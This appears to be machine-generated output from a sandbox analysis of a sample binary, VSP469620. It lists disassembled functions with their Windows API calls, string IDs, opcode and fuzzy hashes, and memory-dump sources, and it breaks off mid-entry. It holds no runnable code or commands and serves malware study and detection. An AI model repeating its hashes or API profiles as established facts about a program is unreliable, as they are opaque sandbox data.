                                                              • Opcode ID: 0ad4acba9c1a73ac2d35073ce8720daf93fb04c87c569b74d538cbd0f79150fe
                                                              • Instruction ID: 75927b2865216be26e83887400b48e1e67e2bf1ae28bc3de66c9917bdb92e39d
                                                              • Opcode Fuzzy Hash: 0ad4acba9c1a73ac2d35073ce8720daf93fb04c87c569b74d538cbd0f79150fe
                                                              • Instruction Fuzzy Hash: 4B415CB1600208EFDB15CFA4C984FAA7BB9EF44310F1481A9FA09DF206D7B1D944CBA0
                                                              Function 00AF5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF5075
                                                              • GetMenuItemInfoW.USER32 ref: 00AF5091
                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00AF50D7
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B71708,00000000), ref: 00AF5120
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 56f0f57389042c577abee1438e0923932a90337d2ae8f6b7457c59c0457eb6de
                                                              • Instruction ID: 6a74c7954d6a4438732860f46147c5e430db8773508697fde9fc7676c8444515
                                                              • Opcode Fuzzy Hash: 56f0f57389042c577abee1438e0923932a90337d2ae8f6b7457c59c0457eb6de
                                                              • Instruction Fuzzy Hash: 8C41C1306047059FD720EF78D885B6AB7E8AF89314F14471EFB6597291DB30E804CB66
                                                              Function 00AFE698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AFE742
                                                              • GetLastError.KERNEL32(?,00000000), ref: 00AFE768
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AFE78D
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AFE7B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID: p1Mw`KNw
                                                              • API String ID: 3321077145-3626030660
                                                              • Opcode ID: cf52c6f96e428df72abc56cb11a0f3f7a731627ee473dc6b0713f675e6a61c0b
                                                              • Instruction ID: 902b1e2c5205022bd414a0e45100123a6b00d848f243724722386dcca38ec2d8
                                                              • Opcode Fuzzy Hash: cf52c6f96e428df72abc56cb11a0f3f7a731627ee473dc6b0713f675e6a61c0b
                                                              • Instruction Fuzzy Hash: 5A413739204614DFCB11EF55C644A9EBBE5BF59710B198098FA46AF3A2CB30FC00CB91
                                                              Function 00B10567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00B10587
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              • Opcode ID: d3a0fce65f72b7e90bc23a5bc0d6a1fd1705845e4199ba53276ba1f818a910d9
                                                              • Instruction ID: d9daa4082967d44d515557417851cdab8f4d8f320b2b6429abde9664c8254088
                                                              • Opcode Fuzzy Hash: d3a0fce65f72b7e90bc23a5bc0d6a1fd1705845e4199ba53276ba1f818a910d9
                                                              • Instruction Fuzzy Hash: BD31D030510616AFCF00EF54CE419EEB3F8FF54310B5086A9E826A72D2DBB1A985CB80
                                                              Function 00AEB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AEB88E
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AEB8A1
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AEB8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 99dc6e884fd7d5697ed0ef25d8b072af60c82c0e4ea491e0d8b3b9a87e752643
                                                              • Instruction ID: b762c4479083f79ba88e64bf622d02ff7e6b6e7d91388bc95a11ebc7e7d9ca0f
                                                              • Opcode Fuzzy Hash: 99dc6e884fd7d5697ed0ef25d8b072af60c82c0e4ea491e0d8b3b9a87e752643
                                                              • Instruction Fuzzy Hash: AC21D375A00148BFDB04ABA5D98ADFF77BDDF45350B104129F021A72E1DB794D069B60
                                                              Function 00B043E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B04401
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B04427
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B04457
                                                              • InternetCloseHandle.WININET(00000000), ref: 00B0449E
                                                                • Part of subcall function 00B05052: GetLastError.KERNEL32(?,?,00B043CC,00000000,00000000,00000001), ref: 00B05067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 1951874230-3916222277
                                                              • Opcode ID: bc223c2407ccca0c63d44529a98eeaa7acac4592c6db6491f5ff21f5475f6089
                                                              • Instruction ID: 5865e7fc203d2ac43f9839ae4e188c1f7bdada05e96e4b13ac02289a2246ac8c
                                                              • Opcode Fuzzy Hash: bc223c2407ccca0c63d44529a98eeaa7acac4592c6db6491f5ff21f5475f6089
                                                              • Instruction Fuzzy Hash: A12180F5500208BEE7119F54DCC5EBFBAECEB48744F10805AF20593280EF649D059770
                                                              Function 00B190E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                                • Part of subcall function 00ACD17C: GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                                • Part of subcall function 00ACD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B1915C
                                                              • LoadLibraryW.KERNEL32(?), ref: 00B19163
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B19178
                                                              • DestroyWindow.USER32(?), ref: 00B19180
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: 9f2e3e262b952f5e763b9f05074b51a61fdee4a5b5ad57a5bca90d0ea01cb0e6
                                                              • Instruction ID: fcc48bdb839991b4f2c3e6367d5bdece13ab02507958920ecde212a27606af83
                                                              • Opcode Fuzzy Hash: 9f2e3e262b952f5e763b9f05074b51a61fdee4a5b5ad57a5bca90d0ea01cb0e6
                                                              • Instruction Fuzzy Hash: 49218E71200246BBEF104F64DC99EFA37E9EF99364F640658FA14A3190C771DCE1A760
                                                              Function 00AF9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00AF9588
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF95B9
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00AF95CB
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AF9605
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: ecbadf8dad55763f275efbf5523dd3e1feac1f7fb91cf6f5ac7daf74f8c59db7
                                                              • Instruction ID: 2e04edcb4f6038ea0548187d55c81ea17e7f62885a6f85a8baef816e3d973cf2
                                                              • Opcode Fuzzy Hash: ecbadf8dad55763f275efbf5523dd3e1feac1f7fb91cf6f5ac7daf74f8c59db7
                                                              • Instruction Fuzzy Hash: D2215170500209ABDB259FA5DC05BAFB7F4AF59720F204A19FAA5D72D0D770D948CB10
                                                              Function 00AF9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00AF9653
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF9683
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00AF9694
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AF96CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 13261a79d19f72edca08ffe7da1c729afa70da14f6050ee17a0f76ddfc4fd0d8
                                                              • Instruction ID: 83a3868dcde9758fc1b50b6a42602dc0bd3fcde6705ab8ec1bbcd2a7a8b89b7e
                                                              • Opcode Fuzzy Hash: 13261a79d19f72edca08ffe7da1c729afa70da14f6050ee17a0f76ddfc4fd0d8
                                                              • Instruction Fuzzy Hash: 0F217F716002099BDB609FA9DC44FAFB7E8AF55724F200A19FAA1E72D0EB70D841CB50
                                                              Function 00AFDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFDB0A
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AFDB5E
                                                              • __swprintf.LIBCMT ref: 00AFDB77
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B4DC00), ref: 00AFDBB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 3e4c47a530c5b0031531ccfce307c237f8d8d326c6385ef95e68c4cb0c231552
                                                              • Instruction ID: 53561ec225e80cfd1494203dc704f9e7790ec84f0fbd519f158524d540d15516
                                                              • Opcode Fuzzy Hash: 3e4c47a530c5b0031531ccfce307c237f8d8d326c6385ef95e68c4cb0c231552
                                                              • Instruction Fuzzy Hash: AD219535600208AFCB10EFA4DE85EEEB7F8EF48714B104069F605E7252DB71EA41DB61
                                                              Function 00AEC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AEC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AEC84A
                                                                • Part of subcall function 00AEC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEC85D
                                                                • Part of subcall function 00AEC82D: GetCurrentThreadId.KERNEL32 ref: 00AEC864
                                                                • Part of subcall function 00AEC82D: AttachThreadInput.USER32(00000000), ref: 00AEC86B
                                                              • GetFocus.USER32 ref: 00AECA05
                                                                • Part of subcall function 00AEC876: GetParent.USER32(?), ref: 00AEC884
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00AECA4E
                                                              • EnumChildWindows.USER32(?,00AECAC4), ref: 00AECA76
                                                              • __swprintf.LIBCMT ref: 00AECA90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                              • String ID: %s%d
                                                              • API String ID: 3187004680-1110647743
                                                              • Opcode ID: 505a9bdf2a2bc964bd41afcfc785fe7c290e42e13caaa82dc21b9e178b9424e5
                                                              • Instruction ID: 568da5ed0f4c3c011e36517947adb0e5197093a86225e2032cd0faeb4a3cf9c6
                                                              • Opcode Fuzzy Hash: 505a9bdf2a2bc964bd41afcfc785fe7c290e42e13caaa82dc21b9e178b9424e5
                                                              • Instruction Fuzzy Hash: 87119D716002097BCF01BFA59E86FE937BDAB44764F00806ABE18AB182DB749546DB70
                                                              Function 00B11945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B119F3
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B11A26
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B11B49
                                                              • CloseHandle.KERNEL32(?), ref: 00B11BBF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: 975d0e20940789562859ede4ce99163ef25d558c4688ace6844d75006acd958a
                                                              • Instruction ID: 1a67928246957b29f6a876e9ac6373271f45ec04e5eb7c2ca8c9f18001fbf466
                                                              • Opcode Fuzzy Hash: 975d0e20940789562859ede4ce99163ef25d558c4688ace6844d75006acd958a
                                                              • Instruction Fuzzy Hash: A9814370600214ABDF109F64C986FAEBBF5EF04720F158499FA15AF382DBB5ED418B90
                                                              Function 00B1E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B1E1D5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B1E20D
                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 00B1E248
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00B1E269
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B1E281
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                              • String ID:
                                                              • API String ID: 3188977179-0
                                                              • Opcode ID: 3f3ec5f37ae3e9535ee953ff884100fda31e7ddc5da87e878adfda8126bcbd6b
                                                              • Instruction ID: acf065165e82c1da98cc3c1c770eaf142d45366bb04ba6985447da0d0d6adce4
                                                              • Opcode Fuzzy Hash: 3f3ec5f37ae3e9535ee953ff884100fda31e7ddc5da87e878adfda8126bcbd6b
                                                              • Instruction Fuzzy Hash: DF617F35600204AFDB25CF58C895FEA77FAEB49700F9444D9FD69A72A1C771E990CB10
                                                              Function 00AF1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00AF1CB4
                                                              • VariantClear.OLEAUT32(00000013), ref: 00AF1D26
                                                              • VariantClear.OLEAUT32(00000000), ref: 00AF1D81
                                                              • VariantClear.OLEAUT32(?), ref: 00AF1DF8
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AF1E26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              • Opcode ID: 6ee999b2f2fb4642ed7e7011291acd0ba709c185beafd73ab1a618fe595cb61a
                                                              • Instruction ID: ca53e9a62fadd41844ef9eb1f4200c8045e8d39acf0962072e92c83a5d686c58
                                                              • Opcode Fuzzy Hash: 6ee999b2f2fb4642ed7e7011291acd0ba709c185beafd73ab1a618fe595cb61a
                                                              • Instruction Fuzzy Hash: AA5137B5A00209EFDB14CF58D880AAAB7B8FF4C354B158559FA59DB301E730EA51CFA0
                                                              Function 00B10688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00B106EE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00B1077D
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B1079B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00B107E1
                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 00B107FB
                                                                • Part of subcall function 00ACE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00AFA574,?,?,00000000,00000008), ref: 00ACE675
                                                                • Part of subcall function 00ACE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00AFA574,?,?,00000000,00000008), ref: 00ACE699
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: ed2a1fbe49ad4b4d8c35a9597388c83ec6864f22fe17f6c1f31b49f1391a686d
                                                              • Instruction ID: d2bde95d352ba7caad180571c257ff748d0685cb68667e874a15065f2a29d82b
                                                              • Opcode Fuzzy Hash: ed2a1fbe49ad4b4d8c35a9597388c83ec6864f22fe17f6c1f31b49f1391a686d
                                                              • Instruction Fuzzy Hash: 6C510675A00205DFCB00EFA8C581EEDB7F9FF59310B558099EA15AB392DB70AD85CB90
                                                              Function 00B12E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B12EEF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B12F2E
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B12F75
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00B12FA1
